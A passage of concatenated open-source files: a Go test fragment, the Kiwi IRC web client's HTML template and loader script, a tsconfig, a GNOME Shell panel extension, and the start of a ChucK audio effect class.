chassis.RegisterSchema("rest", "str")
restServer, err := server.GetServer("rest")
assert.NotNil(t, restServer)
assert.NoError(t, err)
v := reflect.ValueOf(restServer)
opts := reflect.Indirect(v).FieldByName("opts")
chainName := opts.FieldByName("ChainName")
assert.Equal(t, "rest", chainName.String())
}
func TestInitError(t *testing.T) {
t.Log("Testing chassis Init function for errors")
p := filepath.Join(os.Getenv("GOPATH"), "src", "github.com", "go-chassis", "go-chassis", "examples", "communication/client")
os.Setenv("CHASSIS_HOME", p)
lager.Init(&lager.Options{
LoggerLevel: "INFO",
})
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="referrer" content="origin-when-crossorigin">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<base target="_blank">
<title> Kiwi IRC </title>
<link rel="shortcut icon" href="<%base_path%>/assets/img/favicon.ico">
<link rel="stylesheet" type="text/css" href="<%base_path%>/assets/css/style.css?t=<%build_time%>" />
<link rel="stylesheet" type="text/css" href="<%base_path%>/assets/css/font-awesome.min.css" />
</head>
<body>
<script type="text/html" id="tmpl_application">
<div id="kiwi" class="theme_relaxed">
<div class="toolbar">
<div class="app_tools">
<ul class="main">
<li class="settings"><i class="fa fa-cogs" title="Settings"></i></li>
<li class="startup"><i class="fa fa-home" title="Home"></i></li>
<li><a href="https://kiwiirc.com/" target="_blank"><img src="<%base_path%>/assets/img/ico.png" alt="KiwiIRC" title="KiwiIRC" /></a></li>
</ul>
</div>
<div class="tabs"></div>
<div class="topic">
<div contenteditable="true"></div>
</div>
<div class="status_message"></div>
</div>
<div class="memberlists_resize_handle"></div>
<div class="panels">
<div class="panel_container container1"></div>
</div>
<div class="right_bar disabled">
<div class="right-bar-toggle"><i class=""></i></div>
<div class="right-bar-content">
<div class="channel_tools">
<i class="fa fa-info-circle channel_info" title="Channel Info"></i>
<i class="fa fa-sign-out channel_part" title="Leave Channel"></i>
<i class="fa fa-angle-double-right right-bar-toggle-inner" title="Hide"></i>
</div>
<div class="memberlists"></div>
</div>
</div>
<div class="controlbox">
<div class="autocomplete">
<div class="autocomplete-header">
<span class="autocomplete-header-label">People or channels</span>
<span class="autocomplete-header-help">
<strong>tab</strong> or <strong>↑</strong> <strong>↓</strong> to navigate <strong class="left_margin">↵</strong> to select <strong class="left_margin">esc</strong> to dismiss</span>
</div>
</div>
<div class="input">
<span class="nick"> </span>
<div class="input_wrap"><textarea class="inp" wrap="off"></textarea></div>
<div class="input_tools"></div>
</div>
</div>
</div>
</script>
<script type="text/html" id="tmpl_channel_info">
<div class="channel_info">
<b class="channel_url"><a href=""></a></b>
<form>
<div class="control-group channel_info_modes">
<label>
<input type="checkbox" name="channel_mute" class="channel-mode" data-mode="m" />
Moderated chat
</label>
<label>
<input type="checkbox" name="channel_invite" class="channel-mode" data-mode="i" />
Invite only
</label>
<label>
<input type="checkbox" name="channel_topic" class="channel-mode" data-mode="t" />
Only operators can change the topic
</label>
<label>
<input type="checkbox" name="channel_external_messages" class="channel-mode" data-mode="n" />
Block messages from outside this channel
</label>
</div>
<div class="control-group">
<label>
Password
<input type="text" name="channel_key" class="channel-mode" data-mode="k" />
</label>
</div>
<div class="control-group channel-banlist">
<button class="toggle_banlist">Toggle banlist</button> <span class="banlist-status"></span>
<table>
<thead>
<tr>
<td>Ban Mask</td>
<td>Added By</td>
<td>Date Added</td>
<td></td>
</tr>
</thead>
<tbody>
</tbody>
</table>
</div>
</form>
</div>
</script>
<script type="text/html" id="tmpl_userbox">
<div class="userbox">
<a class="close_menu if_op op"><i class="fa fa-star"></i><%= op %></a>
<a class="close_menu if_op deop"><i class="fa fa-star-o"></i><%= de_op %></a>
<a class="close_menu if_op voice"><i class="fa fa-volume-up"></i><%= voice %></a>
<a class="close_menu if_op devoice"><i class="fa fa-volume-off"></i><%= de_voice %></a>
<a class="close_menu if_op kick"><i class="fa fa-times"></i><%= kick %></a>
<a class="close_menu if_op ban"><i class="fa fa-ban"></i><%= ban %></a>
<a class="close_menu query"><i class="fa fa-comment"></i><%= message %></a>
<a class="close_menu info"><i class="fa fa-info-circle"></i><%= info %></a>
<a class="close_menu ignore"><label><i><input type="checkbox" /></i><%= ignore %></label></a>
</div>
</script>
<script type="text/html" id="tmpl_nickchange">
<form class="nickchange">
<label for="nickchange"><%= new_nick %>:</label> <input type="text" mozactionhint="done" autocomplete="off" spellcheck="false"/> <button><%= change %></button> <a class="cancel"><%= cancel %></a>
</form>
</script>
<script type="text/html" id="tmpl_new_connection_info">
<div style="margin:1em 20px;">
<img src="<%base_path%>/assets/img/ico.png" alt="KiwiIRC Logo" title="Kiwi IRC" style="display:block; margin:0 auto;"/> <br />
<p style="font-style:italic;">A <strong>hand-crafted IRC client</strong> that you can enjoy. Designed to be used <strong>easily</strong> and <strong>freely</strong>.</p>
<p style="font-size:0.9em;margin-top:2em;">Peek at the <a href="https://www.kiwiirc.com/">Kiwi IRC homepage</a> for more information or to find out how to embed it on your own website. Looking for source code? Try the <a href="http://github.com/prawnsalad/KiwiIRC/">GitHub</a> page. This network of people may not be associated with Kiwi IRC itself.</p>
</div>
</script>
<script type="text/html" id="tmpl_server_select">
<div class="server_select">
<div class="side_panel" style="position:absolute;top:0px;left:320px;">
<div class="content" style="position:relative;width:300px;">
</div>
</div>
<div class="server_details" style="position:relative;width:320px;">
<div class="status"><%= think_nick %></div>
<form>
<div class="basic">
<table>
<tr class="nick">
<td><label for="server_select_nick"><%= nickname %></label></td>
<td><input type="text" class="nick" id="server_select_nick"></td>
</tr>
<tr class="have_pass">
<td colspan="2">
<label for="server_select_show_pass"><%= have_password %></label> <input type="checkbox" id="server_select_show_pass" style="width:auto;" />
</td>
</tr>
<tr class="pass">
<td><label for="server_select_password"><%= password %></label></td>
<td><input type="password" class="password" id="server_select_password"></td>
</tr>
<tr class="channel">
<td><label for="server_select_channel"><%= channel %></label></td>
<td>
<div style="position:relative;">
<input type="text" class="channel" id="server_select_channel">
<i class="fa fa-key" title="<%= channel_key %>"></i>
</div>
</td>
</tr>
<tr class="have_key">
<td colspan="2">
<label for="server_select_show_channel_key"><%= require_key %></label> <input type="checkbox" id="server_select_show_channel_key" style="width:auto;" />
</td>
</tr>
<tr class="key">
<td><label for="server_select_channel_key"><%= key %></label></td>
<td><input type="password" class="channel_key" id="server_select_channel_key"></td>
</tr>
<tr class="start">
<td></td>
<td><button type="submit"><%= start %></button></td>
</tr>
</table>
<a href="" onclick="return false;" class="show_more"><%= server_network %> <i class="fa fa-caret-down"></i></a>
</div>
<div class="more">
<table>
<tr class="server">
<td><label for="server_select_server"><%= server %></label></td>
<td><input type="text" class="server" id="server_select_server"></td>
<tr>
<tr class="port">
<td><label for="server_select_port"><%= port %></label></td>
<td><input type="text" class="port" id="server_select_port"></td>
</tr>
<tr class="ssl">
<td><label for="server_select_ssl">SSL</label></td>
<td><input type="checkbox" class="ssl" id="server_select_ssl"></td>
</tr>
</table>
</div>
</form>
<a class="kiwi_logo" href="https://kiwiirc.com/" target="_blank">
<h1><span><%= powered_by %></span> <img src="<%base_path%>/assets/img/ico.png" alt="KiwiIRC Logo" title="Kiwi IRC" /></h1>
</a>
</div>
</div>
</script>
<script type="text/html" id="tmpl_theme_thumbnail">
<a class="thumbnail" data-setting="theme" data-value="<%= name.toLowerCase() %>" href="#">
<div class="thumbnail_wrapper"><div class="theme_color" style="background-color: <%= thumbnail_colour %>;"></div></div>
<div class="caption"><u><%= name %></u></div>
</a>
</script>
<script type="text/html" id="tmpl_applet_settings">
<div class="settings_container">
<div class="settings-category-list">
<a class="show-category show-category-appearance" data-category="appearance"><%= appearance %></a>
<a class="show-category show-category-messages" data-category="messages"><%= messages %></a>
</div>
<form class="settings-category settings-category-messages">
<h5><%= messages %></h5>
<section>
<h6><%= chat_messages %></h6>
<div class="control-group">
<div class="checkbox">
<label>
<input data-setting="show_timestamps" type="checkbox">
<%= timestamps %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="use_24_hour_timestamps" type="checkbox">
<%= timestamp_24 %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="show_emoticons" type="checkbox">
<%= emoticons %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="ignore_new_queries" type="checkbox">
<%= queries %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="show_autocomplete_slideout" type="checkbox">
<%= autocomplete_slideout %>
</label>
</div>
<div>
<label>
<input data-setting="scrollback" class="input-small" type="text" size="4" pattern="\d*">
<span><%= scroll_history %></span>
</label>
</div>
</div>
</section>
<section>
<h6><%= alerts_notifications %></h6>
<div class="control-group">
<div class="checkbox">
<label>
<input data-setting="show_joins_parts" type="checkbox">
<%= join_part %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="count_all_activity" type="checkbox">
<%= count_all_activity %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="mute_sounds" type="checkbox">
<%= mute %>
</label>
</div>
<div>
<label>
<div><%= custom_highlights %></div>
<input data-setting="custom_highlights" class="input-small" type="text" size="20">
</label>
</div>
</div>
</section>
</form>
<form class="settings-category settings-category-appearance">
<h5><%= appearance %></h5>
<section>
<h6><%= theme %></h6>
<div class="control-group">
<div class="thumbnails">
<% _.forEach(theme_thumbnails, function(thumbnail) { %>
<%= thumbnail %>
<% }); %>
</div>
</div>
</section>
<section>
<h6><%= channels %></h6>
<div class="control-group">
<div class="radio">
<label>
<input type="radio" name="channel_list_style" data-setting="channel_list_style" value="tabs">
<%= tabs %>
</label>
</div>
<div class="radio">
<label>
<input type="radio" name="channel_list_style" data-setting="channel_list_style" value="list">
<%= list %><small class="text-muted">(<%= large_amounts_of_chans %>)</small>
</label>
</div>
<label>
<input data-setting="scrollback" class="input-small" type="text" size="4" pattern="\d*">
<span><%= scroll_history %></span>
</label>
</div>
</section>
<section class="language">
<h6><%= language %></h6>
<div class="control-group">
<select data-setting="locale">
<option value=""></li>
<% _.forEach(languages, function(lang) { %>
<option value="<%= lang.tag %>"><%= lang.language %></li>
<% }); %>
</select>
<br>
<small><%= locale_restart_needed %></small>
</div>
</section>
<section class="protocol_handler">
<h6><%= default_client %></h6>
<div class="control-group">
<button class="register_protocol"><%= make_default %></button>
<br>
<small><%= default_note %></small>
</div>
</section>
<section class="notification_enabler">
<h6><%= html5_notifications %></h6>
<div class="control-group">
<button class="enable_notifications"><%= enable_notifications %></button>
</div>
</section>
</form>
</div>
</script>
<script type="text/html" id="tmpl_channel_list">
<div class="applet_chanlist">
<table>
<thead style="font-weight: bold;">
<tr>
<td><a class="channel_name_title"><%= channel_name %></a></td>
<td><a class="users_title"><%= users %></a></td>
<td style="padding-left: 2em;"><%= topic %></td>
</tr>
</thead>
<tbody style="vertical-align: top;">
</tbody>
</table>
</div>
</script>
<script type="text/html" id="tmpl_script_editor">
<div style="height:100%;">
<style>
#kiwi .script_editor .se_toolbar { padding: 10px 20px; }
#kiwi .script_editor .se_toolbar span.status { margin-left:2em; font-style:italic; }
#kiwi .script_editor .se_toolbar button { height:30px; padding:0 1em; }
#kiwi .script_editor .se_toolbar button i { font-size:1.2em; margin-left:3px; }
</style>
<div class="script_editor" style="height:100%; position:relative;">
<div class="se_toolbar"><button class="btn_save"><%= save %><i class="fa fa-floppy-o"></i></button><span class="status"></span></div>
<div class="editor" style="position:absolute;top:50px;bottom:0px;left:0px;right:0px;"></div>
</div>
</div>
</script>
<script type="text/html" id="tmpl_notifications">
<div class="notification-inner">
<i class="fa fa-times close"></i>
<h6></h6>
<div class="content"></div>
</div>
</script>
<script src="<%base_path%>/assets/libs/jquery-1.11.1.min.js"></script>
<script>
/* Script loader (https://github.com/ded/script.js) */
(function(a,b,c){typeof c["module"]!="undefined"&&c.module.exports?c.module.exports=b():typeof c["define"]!="undefined"&&c["define"]=="function"&&c.define.amd?define(a,b):c[a]=b()})("$script",function(){function p(a,b){for(var c=0,d=a.length;c<d;++c)if(!b(a[c]))return j;return 1}function q(a,b){p(a,function(a){return!b(a)})}function r(a,b,i){function o(a){return a.call?a():d[a]}function t(){if(!--n){d[m]=1,l&&l();for(var a in f)p(a.split("|"),o)&&!q(f[a],o)&&(f[a]=[])}}a=a[k]?a:[a];var j=b&&b.call,l=j?b:i,m=j?a.join(""):b,n=a.length;return setTimeout(function(){q(a,function(a){if(h[a])return m&&(e[m]=1),h[a]==2&&t();h[a]=1,m&&(e[m]=1),s(!c.test(a)&&g?g+a+".js":a,t)})},0),r}function s(c,d){var e=a.createElement("script"),f=j;e.onload=e.onerror=e[o]=function(){if(e[m]&&!/^c|loade/.test(e[m])||f)return;e.onload=e[o]=null,f=1,h[c]=2,d()},e.async=1,e.src=c,b.insertBefore(e,b.firstChild)}var a=document,b=a.getElementsByTagName("head")[0],c=/^https?:\/\//,d={},e={},f={},g,h={},i="string",j=!1,k="push",l="DOMContentLoaded",m="readyState",n="addEventListener",o="onreadystatechange";return!a[m]&&a[n]&&(a[n](l,function t(){a.removeEventListener(l,t,j),a[m]="complete"},j),a[m]="loading"),r.get=s,r.order=function(a,b,c){(function d(e){e=a.shift(),a.length?r(e,d):r(e,b,c)})()},r.path=function(a){g=a},r.ready=function(a,b,c){a=a[k]?a:[a];var e=[];return!q(a,function(a){d[a]||e[k](a)})&&p(a,function(a){return d[a]})?b():!function(a){f[a]=f[a]||[],f[a][k](b),c&&c(e)}(a.join("|")),r},r},this)
// Avoid `console` errors in browsers that lack a console. (https://github.com/h5bp/html5-boilerplate)
function normalizeConsole() {
var method;
var noop = function () {};
var methods = [
'assert', 'clear', 'count', 'debug', 'dir', 'dirxml', 'error',
'exception', 'group', 'groupCollapsed', 'groupEnd', 'info', 'log',
'markTimeline', 'profile', 'profileEnd', 'table', 'time', 'timeEnd',
'timeStamp', 'trace', 'warn'
];
var length = methods.length;
var console = (window.console = window.console || {});
while (length--) {
method = methods[length];
// Only stub undefined methods.
if (!console[method]) {
console[method] = noop;
}
}
}
normalizeConsole();
function getQueryVariable(variable) {
var query = window.location.search.substring(1);
var vars = query.split('&');
for (var i = 0; i < vars.length; i++) {
var pair = vars[i].replace(/\+/g, '%20').split('=');
if (decodeURIComponent(pair[0]) == variable) {
return decodeURIComponent(pair[1]);
}
}
}
(function afterPromiseAvailable() {
var base_path = '<%base_path%>', // Entry path for the kiwi application
scripts = [],
opts = {
container: $('body'),
base_path: base_path,
settings_path: base_path + '/assets/settings.json',
locale: getQueryVariable('locale')
},
script_promise, script_promise_resolve,
onload_promise,
settings_promise;
// If the browser doesn't natively support promises load up the polyfill and try again.
if (!window.Promise) {
$script(base_path + "/assets/libs/promise.min.js", afterPromiseAvailable);
return;
}
function loadScripts(scripts) {
return new Promise(function (resolve, reject) {
var to_load, idx,
base = base_path + '/';
if (typeof scripts === 'string') {
to_load = base + scripts;
} else {
to_load = [];
for (idx in scripts) {
to_load.push(base + scripts[idx]);
}
}
$script(to_load, resolve, reject);
});
}
onload_promise = new Promise(function (resolve) {
// Document may already be loaded if we had to load the Promise shim seperately
if (document.readyState === 'complete') {
resolve();
return;
}
window.onload = resolve;
});
// Get a resolve function for the script loading promises
script_promise = new Promise(function (resolve) {
script_promise_resolve = resolve;
});
// Chain each script loading promise
script_promise = script_promise.then(function () {
var idx;
for (idx = 0; idx < scripts.length; idx++) {
(function (idx) {
script_promise = script_promise.then(function () {
return loadScripts(scripts[idx]);
});
})(idx);
}
});
// Debugging will get a list of debugging scripts from settings.json (below)
if (!getQueryVariable('debug')) {
scripts.push(['assets/libs/lodash.min.js?t=<%build_time%>']);
scripts.push([
'assets/libs/backbone.min.js?t=<%build_time%>',
'assets/libs/jed.js?t=<%build_time%>'
]);
scripts.push([
'assets/kiwi.min.js?t=<%build_time%>',
'assets/libs/engine.io.bundle.min.js?t=<%build_time%>'
]);
script_promise_resolve();
}
settings_promise = new Promise(function (resolve) {
$.getJSON(opts.settings_path, function (data) {
opts.server_settings = data.server_settings;
opts.client_plugins = data.client_plugins;
opts.translations = data.translations;
opts.themes = data.themes;
if (typeof data.kiwi_server !== 'undefined') {
opts.kiwi_server = data.kiwi_server;
}
resolve();
// If debugging, grab the debug scripts and load them
if (getQueryVariable('debug')) {
scripts = scripts.concat(data.scripts);
script_promise_resolve();
}
// Load themes
if (opts.themes) {
$.each(opts.themes, function (theme_idx, theme) {
var disabled = (opts.server_settings.client.settings.theme.toLowerCase() !== theme.name.toLowerCase());
var link = $.parseHTML('<link rel="stylesheet" type="text/css" data-theme href="'+ opts.base_path + '/assets/themes/' + theme.name.toLowerCase() + '/style.css" title="' + theme.name.toLowerCase() + '" />');
$(link).appendTo($('head'));
if (disabled) {
link.disabled = disabled;
}
});
}
});
});
// prawnsalad: Why is the below script_promise in its own .then()?
// M2Ys4U: prawnsalad: either of the first two promises can resolve the
// third one, but the third one has a then() on it already, so the
// then() on the all() makes it wait for the then() on the script promise
// to resolve.
//
// Promises - simple.
Promise.all([onload_promise, settings_promise])
.then(function(){return script_promise})
.then(function startApp() {
// Kiwi IRC version this is built from
kiwi.build_version = '<%build_version%>';
// Start the app after loading plugins
kiwi.init(opts, function() {
if (opts.client_plugins && opts.client_plugins.length > 0) {
// Wait until all plugins are loaded before starting the app
kiwi.plugins.once('loaded', function() {
kiwi.start();
});
_.each(opts.client_plugins, function (plugin_url) {
kiwi.plugins.load(plugin_url);
});
} else {
// No plugins were needed so start the app
kiwi.start();
}
});
});
})();
</script>
</body>
</html>
| {
"pile_set_name": "Github"
} |
{
"compilerOptions": {
"module": "commonjs",
"lib": [
"es6"
],
"noImplicitAny": true,
"noImplicitThis": true,
"strictNullChecks": true,
"strictFunctionTypes": true,
"baseUrl": "../",
"typeRoots": [
"../"
],
"types": [],
"noEmit": true,
"forceConsistentCasingInFileNames": true
},
"files": [
"index.d.ts",
"eslint-plugin-prettier-tests.ts"
]
}
| {
"pile_set_name": "Github"
} |
const Gi = imports._gi
const System = imports.system
const GObject = imports.gi.GObject
const Clutter = imports.gi.Clutter
const Shell = imports.gi.Shell
const AppSystem = imports.gi.Shell.AppSystem.get_default()
const WinTracker = imports.gi.Shell.WindowTracker.get_default()
const Main = imports.ui.main
const Config = imports.misc.config
const Unite = imports.misc.extensionUtils.getCurrentExtension()
const AppMenu = Main.panel.statusArea.appMenu
const Activities = Main.panel.statusArea.activities
const Buttons = Unite.imports.buttons
const Handlers = Unite.imports.handlers
const VERSION = parseInt(Config.PACKAGE_VERSION.split('.')[1])
var PanelExtension = class PanelExtension {
constructor(settings, key, callback) {
this.activated = false
const isActive = () => {
return callback.call(null, settings.get(key))
}
const onChange = () => {
const active = isActive()
if (active && !this.activated) {
this.activated = true
return this._init()
}
if (!active && this.activated) {
this.activated = false
return this._destroy()
}
}
this.activate = () => {
settings.connect(key, onChange.bind(this))
onChange()
}
this.destroy = () => {
if (this.activated) {
this._destroy()
this.activated = false
}
}
}
}
var WindowButtons = class WindowButtons extends PanelExtension {
constructor({ settings }) {
const active = val => val != 'never'
super(settings, 'show-window-buttons', active)
}
_init() {
this.theme = 'default-dark'
this.signals = new Handlers.Signals()
this.settings = new Handlers.Settings()
this.styles = new Handlers.Styles()
this.controls = new Buttons.WindowControls()
this.signals.connect(
Main.overview, 'showing', this._syncVisible.bind(this)
)
this.signals.connect(
Main.overview, 'hiding', this._syncVisible.bind(this)
)
this.signals.connect(
WinTracker, 'notify::focus-app', this._syncVisible.bind(this)
)
this.settings.connect(
'button-layout', this._onPositionChange.bind(this)
)
this.settings.connect(
'window-buttons-placement', this._onPositionChange.bind(this)
)
this.settings.connect(
'window-buttons-theme', this._onThemeChange.bind(this)
)
Main.panel.addToStatusArea(
'uniteWindowControls', this.controls, this.index, this.side
)
this._onPositionChange()
this._onThemeChange()
this._syncVisible()
}
get position() {
return this.settings.get('window-buttons-position')
}
get placement() {
return this.settings.get('window-buttons-placement')
}
get side() {
const sides = { first: 'left', last: 'right', auto: this.position }
return sides[this.placement] || this.placement
}
get index() {
if (this.placement == 'first') return 0
if (this.placement == 'last') return -1
return null
}
get sibling() {
if (this.side == 'left') {
return Main.panel.statusArea.appMenu.get_parent()
} else {
return Main.panel.statusArea.aggregateMenu.get_parent()
}
}
get container() {
if (this.side == 'left') {
return Main.panel._leftBox
} else {
return Main.panel._rightBox
}
}
_onLayoutChange() {
const buttons = this.settings.get('window-buttons-layout')
if (this.side != this.position) {
buttons.reverse()
}
this.controls.addButtons(buttons)
this._syncVisible()
}
_onPositionChange() {
const controls = this.controls.container
if (controls.reparent) {
controls.reparent(this.container)
} else {
const currentParent = controls.get_parent()
if (currentParent) {
currentParent.remove_child(controls)
this.container.add_child(controls)
}
}
if (this.index != null) {
this.container.set_child_at_index(controls, this.index)
} else {
this.container.set_child_below_sibling(controls, this.sibling)
}
this._onLayoutChange()
}
_onThemeChange() {
this.controls.remove_style_class_name(this.theme)
this.theme = this.settings.get('window-buttons-theme')
const path = `themes/${this.theme}/stylesheet.css`
this.styles.addShellStyle('windowButtons', path)
this.controls.add_style_class_name(this.theme)
}
_syncVisible() {
const overview = Main.overview.visibleTarget
const focusApp = WinTracker.focus_app || AppMenu._targetApp
if (!overview && focusApp && focusApp.state == Shell.AppState.RUNNING) {
const win = global.unite.focusWindow
this.controls.setVisible(win && win.showButtons)
} else {
this.controls.setVisible(false)
}
}
_destroy() {
this.controls.destroy()
this.signals.disconnectAll()
this.settings.disconnectAll()
this.styles.removeAll()
}
}
var ExtendLeftBox = class ExtendLeftBox extends PanelExtension {
constructor({ settings }) {
const active = val => val == true
super(settings, 'extend-left-box', active)
}
_init() {
this._default = Main.panel.__proto__.vfunc_allocate
if (VERSION < 37) {
Main.panel.__proto__[Gi.hook_up_vfunc_symbol]('allocate', (box, flags) => {
Main.panel.vfunc_allocate.call(Main.panel, box, flags)
this._allocate(Main.panel, box, flags)
})
} else {
Main.panel.__proto__[Gi.hook_up_vfunc_symbol]('allocate', (box) => {
Main.panel.vfunc_allocate.call(Main.panel, box)
this._allocate(Main.panel, box)
})
}
Main.panel.queue_relayout()
}
_boxAllocate(box, childBox, flags) {
if (VERSION < 37) {
box.allocate(childBox, flags)
} else {
box.allocate(childBox)
}
}
_allocate(actor, box, flags) {
let leftBox = Main.panel._leftBox
let centerBox = Main.panel._centerBox
let rightBox = Main.panel._rightBox
let allocWidth = box.x2 - box.x1
let allocHeight = box.y2 - box.y1
let [leftMinWidth, leftNaturalWidth] = leftBox.get_preferred_width(-1)
let [centerMinWidth, centerNaturalWidth] = centerBox.get_preferred_width(-1)
let [rightMinWidth, rightNaturalWidth] = rightBox.get_preferred_width(-1)
let sideWidth = allocWidth - rightNaturalWidth - centerNaturalWidth
let childBox = new Clutter.ActorBox()
childBox.y1 = 0
childBox.y2 = allocHeight
if (actor.get_text_direction() == Clutter.TextDirection.RTL) {
childBox.x1 = allocWidth - Math.min(Math.floor(sideWidth), leftNaturalWidth)
childBox.x2 = allocWidth
} else {
childBox.x1 = 0
childBox.x2 = Math.min(Math.floor(sideWidth), leftNaturalWidth)
}
this._boxAllocate(leftBox, childBox, flags)
childBox.y1 = 0
childBox.y2 = allocHeight
if (actor.get_text_direction() == Clutter.TextDirection.RTL) {
childBox.x1 = rightNaturalWidth
childBox.x2 = childBox.x1 + centerNaturalWidth
} else {
childBox.x1 = allocWidth - centerNaturalWidth - rightNaturalWidth
childBox.x2 = childBox.x1 + centerNaturalWidth
}
this._boxAllocate(centerBox, childBox, flags)
childBox.y1 = 0
childBox.y2 = allocHeight
if (actor.get_text_direction() == Clutter.TextDirection.RTL) {
childBox.x1 = 0
childBox.x2 = rightNaturalWidth
} else {
childBox.x1 = allocWidth - rightNaturalWidth
childBox.x2 = allocWidth
}
this._boxAllocate(rightBox, childBox, flags)
}
_destroy() {
Main.panel.__proto__[Gi.hook_up_vfunc_symbol]('allocate', this._default)
this._default = null
Main.panel.queue_relayout()
}
}
var ActivitiesButton = class ActivitiesButton extends PanelExtension {
constructor({ settings }) {
const active = val => val != 'never'
super(settings, 'hide-activities-button', active)
}
_init() {
this.signals = new Handlers.Signals()
this.settings = new Handlers.Settings()
this.signals.connect(
Main.overview, 'showing', this._syncVisible.bind(this)
)
this.signals.connect(
Main.overview, 'hiding', this._syncVisible.bind(this)
)
this.signals.connect(
AppSystem, 'app-state-changed', this._syncVisible.bind(this)
)
this.signals.connect(
WinTracker, 'notify::focus-app', this._syncVisible.bind(this)
)
this.settings.connect(
'show-desktop-name', this._syncVisible.bind(this)
)
this._syncVisible()
}
get hideButton() {
return this.settings.get('hide-activities-button')
}
get showDesktop() {
return this.settings.get('show-desktop-name')
}
_syncVisible() {
const button = Activities.container
const overview = Main.overview.visibleTarget
const focusApp = WinTracker.focus_app || AppMenu._targetApp
if (this.hideButton == 'always') {
return button.hide()
}
if (this.showDesktop) {
button.visible = overview
} else {
button.visible = overview || focusApp == null
}
}
_destroy() {
if (!Main.overview.isDummy) {
Activities.container.show()
}
this.signals.disconnectAll()
this.settings.disconnectAll()
}
}
var DesktopName = class DesktopName extends PanelExtension {
constructor({ settings }) {
const active = val => val == true
super(settings, 'show-desktop-name', active)
}
_init() {
this.signals = new Handlers.Signals()
this.settings = new Handlers.Settings()
this.label = new Buttons.DesktopLabel()
this.signals.connect(
Main.overview, 'showing', this._syncVisible.bind(this)
)
this.signals.connect(
Main.overview, 'hiding', this._syncVisible.bind(this)
)
this.signals.connect(
AppSystem, 'app-state-changed', this._syncVisible.bind(this)
)
this.signals.connect(
WinTracker, 'notify::focus-app', this._syncVisible.bind(this)
)
this.settings.connect(
'desktop-name-text', this._onTextChanged.bind(this)
)
Main.panel.addToStatusArea(
'uniteDesktopLabel', this.label, 1, 'left'
)
this._onTextChanged()
this._syncVisible()
}
_syncVisible() {
const overview = Main.overview.visibleTarget
const focusApp = WinTracker.focus_app || AppMenu._targetApp
this.label.setVisible(!overview && focusApp == null)
}
_onTextChanged() {
const text = this.settings.get('desktop-name-text')
this.label.setText(text)
}
_destroy() {
this.label.destroy()
this.signals.disconnectAll()
this.settings.disconnectAll()
}
}
var TrayIcons = class TrayIcons extends PanelExtension {
constructor({ settings }) {
const active = val => val == true
super(settings, 'show-legacy-tray', active)
}
_init() {
this.tray = new Shell.TrayManager()
this.settings = new Handlers.Settings()
this.indicators = new Buttons.TrayIndicator()
this.tray.connect(
'tray-icon-added', this._onIconAdded.bind(this)
)
this.tray.connect(
'tray-icon-removed', this._onIconRemoved.bind(this)
)
this.settings.connect(
'greyscale-tray-icons', this._onGreyscaleChange.bind(this)
)
Main.panel.addToStatusArea(
'uniteTrayIndicator', this.indicators, 0, 'right'
)
this.tray.manage_screen(Main.panel)
}
_desaturateIcon(icon) {
const greyscale = this.settings.get('greyscale-tray-icons')
icon.clear_effects()
if (greyscale) {
const desEffect = new Clutter.DesaturateEffect({ factor : 1.0 })
const briEffect = new Clutter.BrightnessContrastEffect({})
briEffect.set_brightness(0.2)
briEffect.set_contrast(0.3)
icon.add_effect_with_name('desaturate', desEffect)
icon.add_effect_with_name('brightness-contrast', briEffect)
}
}
_onIconAdded(trayManager, icon) {
this.indicators.addIcon(icon)
this._desaturateIcon(icon)
}
_onIconRemoved(trayManager, icon) {
this.indicators.removeIcon(icon)
}
_onGreyscaleChange() {
this.indicators.forEach(this._desaturateIcon.bind(this))
}
_destroy() {
this.tray = null
System.gc()
this.indicators.destroy()
this.settings.disconnectAll()
}
}
var PanelManager = GObject.registerClass(
class UnitePanelManager extends GObject.Object {
_init() {
this.settings = new Handlers.Settings()
this.buttons = new WindowButtons(this)
this.extender = new ExtendLeftBox(this)
this.activities = new ActivitiesButton(this)
this.desktop = new DesktopName(this)
this.tray = new TrayIcons(this)
}
activate() {
this.buttons.activate()
this.extender.activate()
this.activities.activate()
this.desktop.activate()
this.tray.activate()
}
destroy() {
this.buttons.destroy()
this.extender.destroy()
this.activities.destroy()
this.desktop.destroy()
this.tray.destroy()
this.settings.disconnectAll()
}
}
)
| {
"pile_set_name": "Github"
} |
/*
LiCK Library for ChucK.
Copyright (c) 2007-2020 held jointly by the individual authors.
This file is part of LiCK.
LiCK is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
LiCK is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with LiCK. If not, see <http://www.gnu.org/licenses/>.
*/
class Follower extends Chugen
{
SqrOsc @ osc1;
SqrOsc @ osc2;
PitchTrack @ pitchTrack;
fun float tick(float in)
{
pitchTrack.get() => float freq;
freq/2.0 => osc1.freq;
freq/4.0 => osc2.freq;
return in;
}
}
class BlueBox3 extends Effect
{
SqrOsc osc1;
SqrOsc osc2;
PitchTrack pitchTrack;
Follower follower;
0.66 => osc1.gain;
0.33 => osc2.gain;
256 => pitchTrack.frame;
1 => pitchTrack.overlap;
osc1 @=> follower.osc1;
osc2 @=> follower.osc2;
pitchTrack @=> follower.pitchTrack;
Gen17 gen17;
[1.0, 0.5, 0.25, 0.125, 0.06, 0.03, 0.015] @=> float coefs[];
coefs => gen17.coefs;
inlet => follower => blackhole;
inlet => pitchTrack => blackhole;
osc1 => gen17;
osc2 => gen17;
gen17 => wet;
fun void moreEvens()
{
coefs[1] * 1.1 => coefs[1];
coefs[3] * 1.1 => coefs[3];
coefs[5] * 1.1 => coefs[5];
coefs => gen17.coefs;
}
fun void lessEvens()
{
coefs[1] * 0.8 => coefs[1];
coefs[3] * 0.8 => coefs[3];
coefs[5] * 0.8 => coefs[5];
coefs => gen17.coefs;
}
fun void moreOdds()
{
coefs[0] * 1.1 => coefs[0];
